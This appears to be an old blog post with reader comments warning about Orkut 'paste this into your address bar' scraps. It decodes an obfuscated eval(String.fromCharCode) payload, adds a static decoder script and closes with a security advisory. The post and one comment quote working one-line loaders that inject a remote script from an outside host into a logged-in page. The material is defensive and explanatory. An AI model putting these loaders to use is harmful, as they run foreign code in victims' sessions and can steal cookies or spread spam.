Orkut Scripts

Of late, I’ve been getting a lot of scraps in orkut like “Paste this text into your address bar. Don’t worry it’s harmless…”

The latest is a pretty interesting one…

javascript:eval(String.fromCharCode(100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 99, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 100, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 99, 41, 59, 99, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 99, 111, 111, 108, 112, 99, 115, 116, 117, 102, 102, 46, 103, 111, 111, 103, 108, 101, 112, 97, 103, 101, 115, 46, 99, 111, 109, 47, 114, 111, 100, 114, 105, 103, 111, 46, 117, 115, 101, 114, 46, 106, 115, 39, 59, 118, 111, 105, 100, 40, 48, 41))

The eval function of JavaScript takes a string and executes it as if it were JavaScript code. String.fromCharCode takes a series of numbers and returns the string made of the characters with those character codes (here, plain ASCII). Together, the two let the sender hide the real code from anyone who only glances at the scrap.

A simple one-line C program reveals the string behind the integers (line breaks added for readability):

d=document;
c=d.createElement('script');
d.body.appendChild(c);
c.src='http://coolpcstuff.googlepages.com/rodrigo.user.js';
void(0)

This is a pretty simple bit of code: it creates a script element, appends it to the current document and points its src at the address shown above, so whatever that file contains runs inside the orkut page you are logged into, with the same rights as orkut's own code. When I tried to fetch the script from that site, I got the message: "This site has been disabled for violations of our Program Policies."
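The safe way to find out what such a scrap does is to decode it without ever evaluating it. The following is an added example, not code from the original post or from the scrap's author: a small static decoder that strips the javascript: prefix, unwraps eval(String.fromCharCode(...)) layers, and pulls out every URL the snippet would assign to a script element's src. It also handles the unobfuscated form of the same trick (a plain d=document;c=d.createElement('script')... one-liner). The two payloads are constructed inline from the text quoted on this page; everything else about the snippet (the helper names, the output shape) is my own choice.

```javascript
// Added example: statically decode a "paste this into your address bar" payload.
// Nothing here is evaluated; String.fromCharCode is only used on number lists
// that we already know are number lists, never on attacker-controlled code.

// The obfuscated scrap quoted in the post, rebuilt from its character codes
// (constructed test input, copied from the page).
const SCRAP_CODES = [
  100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 99, 61, 100, 46, 99, 114,
  101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105,
  112, 116, 39, 41, 59, 100, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110,
  100, 67, 104, 105, 108, 100, 40, 99, 41, 59, 99, 46, 115, 114, 99, 61, 39, 104,
  116, 116, 112, 58, 47, 47, 99, 111, 111, 108, 112, 99, 115, 116, 117, 102, 102,
  46, 103, 111, 111, 103, 108, 101, 112, 97, 103, 101, 115, 46, 99, 111, 109, 47,
  114, 111, 100, 114, 105, 103, 111, 46, 117, 115, 101, 114, 46, 106, 115, 39, 59,
  118, 111, 105, 100, 40, 48, 41,
];
const SCRAP_PAYLOAD =
  'javascript:eval(String.fromCharCode(' + SCRAP_CODES.join(', ') + '))';

// The unobfuscated variant posted in the comments (constructed test input).
const COMMENT_PAYLOAD =
  "javascript:d=document;c=d.createElement('script');d.body.appendChild(c);" +
  "c.src='http://cpraveen.com/orkut.js';void(0)";

// eval(String.fromCharCode(n, n, ...)) -> the decoded code itself
const EVAL_FROMCHARCODE = /eval\(\s*String\.fromCharCode\(([\d\s,]+)\)\s*\)/g;
// a bare String.fromCharCode(n, n, ...) -> a quoted string literal
const FROMCHARCODE = /String\.fromCharCode\(([\d\s,]+)\)/g;

// Turn "100, 61, 100" into the string those codes spell.
function codesToString(list) {
  const codes = list
    .split(',')
    .map((s) => parseInt(s.trim(), 10))
    .filter(Number.isFinite);
  return String.fromCharCode(...codes);
}

// Peel fromCharCode layers until the text stops changing.
function deobfuscate(code) {
  let prev;
  do {
    prev = code;
    code = code.replace(EVAL_FROMCHARCODE, (_, nums) => codesToString(nums));
    code = code.replace(FROMCHARCODE, (_, nums) => JSON.stringify(codesToString(nums)));
  } while (code !== prev);
  return code;
}

// Analyse one javascript: URL and report what it would load.
function analyzeBookmarklet(url) {
  if (!/^javascript:/i.test(url)) {
    throw new Error('not a javascript: URL');
  }
  let body = url.slice('javascript:'.length);
  try {
    body = decodeURIComponent(body); // browsers percent-decode these URLs
  } catch (_) {
    // not percent-encoded; keep the raw text
  }
  const decoded = deobfuscate(body);
  const scriptSources = [...decoded.matchAll(/\.src\s*=\s*(['"])(.*?)\1/g)].map((m) => m[2]);
  return {
    obfuscated: body !== decoded,
    injectsScriptTag: /createElement\(\s*['"]script['"]\s*\)/.test(decoded),
    scriptSources,
    decoded,
  };
}

console.log(JSON.stringify(analyzeBookmarklet(SCRAP_PAYLOAD), null, 2));
console.log(JSON.stringify(analyzeBookmarklet(COMMENT_PAYLOAD), null, 2));
```

The output for the scrap is the one-liner shown above, with http://coolpcstuff.googlepages.com/rodrigo.user.js as the only script source. Note that the decoder tells you where the code comes from, not what it does; for that you still have to read the remote file, which in this case the host would not serve.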

A quick Google search for the script file name turned up reports that the script simply floods your friends' scrapbooks with the same message. Apparently harmless. The key word is apparently.

Now, I have a healthy dose of paranoia. I don't trust any of these scripts unless I write them myself, or at least examine them myself. I have tried to access some of the scripts directly (which should return the script source without executing it), but the site gives me a permission denied (reason: hotlinking forbidden). A script that can be loaded into your orkut session but that you are not allowed to read gives me all the more reason to suspect something is amiss.

I still don't get why people jump on scripts like this, when the orkut home page warns (or at least used to) against running any script while logged into orkut. So, I'll put out a simple security advisory.

Don't run any script while logged into orkut (or, for that matter, any website), no matter what it claims to do. Code you paste into the address bar runs inside the page with the same rights as the site's own code: it can read your session cookies, see everything on the page (including personal information you have hidden from your friends), and post or send messages as you. If a script can read your friends list, it can read anything.

4 Responses to “Orkut Scripts”

  1. Praveen Kumar C Says:

    Cool, I tried that script and at once I saw in the status bar that it tried to download a script from the specific site. I realized that something was going wrong and tried to directly access the script; I found Google has already blocked the site. I am not sure the page is actually displayed by Google.

    Just googled for the site to see the cache, nothing was there, and finally came to this blog. Does that script steal the cookies? Anyhow, I have changed the passwords at once.

    Also I need you to check whether this script is malicious.

    javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://cpraveen.com/orkut.js';void(0)

    If you reply to this message, please mail me to let me know, because I just came to your site in a rush and may not come again.

    Thanks,
    Praveen Kumar C

  2. Saravana Says:

    Came here searching for the meaning of this script. Good thing the script was already deleted by the time I executed it. I don't sense anything really harmful in this, but what if it was!!

  3. dev Says:

    I am lucky too that I used this script after it was disabled. I never try scripts, but it was sent by one of my most reliable pals.

  4. manishgarg Says:

    Thanks, yaar.
